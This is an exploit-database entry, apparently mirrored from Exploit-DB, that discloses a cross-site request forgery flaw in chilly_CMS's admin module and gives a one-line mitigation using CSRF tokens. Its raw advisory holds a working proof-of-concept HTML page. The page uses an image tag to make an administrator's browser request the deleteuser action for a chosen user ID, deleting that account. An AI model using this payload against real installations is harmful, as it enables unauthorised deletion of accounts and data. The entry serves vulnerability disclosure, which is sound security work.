header-logo
Suggest Exploit
vendor:
chilly_CMS
by:
Pratul Agrawal
8,8
CVSS
HIGH
Cross Site Request Forgery (CSRF)
352
CWE
Product Name: chilly_CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: chillycms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: php
2020

chilly_CMS CSRF Vulnerability

A script was created to delete the admin user through Cross Site Request Forgery (CSRF). An image tag was used to send a request to the server with the action parameter set to deleteuser and the id parameter set to the user ID. After execution, the page was refreshed and the added content was deleted automatically.

Mitigation:

Implementing a CSRF token in the request can help prevent CSRF attacks.
Source

Exploit-DB raw data:

                                =======================================================================
   
                                                    chilly_CMS CSRF Vulnerability
 
                                =======================================================================
   
                                                              
 
   
   
  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      chilly_CMS

  # Category  	  CMS / Portals
  
  # Plateform     php

  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #  Proof of concept   #
   
 
   Script to Delete the Admin user through Cross Site request forgery
   
             .  ................................................................................................................
   
                        <html>
 
                          <body>
 
                              <img src=http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />
 
                          </body>
 
                        </html>
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that a added content is deleted automatically.
  
  
  #If you have any questions, comments, or concerns, feel free to contact me.

Navigation

Suggest Exploit

Services By CQR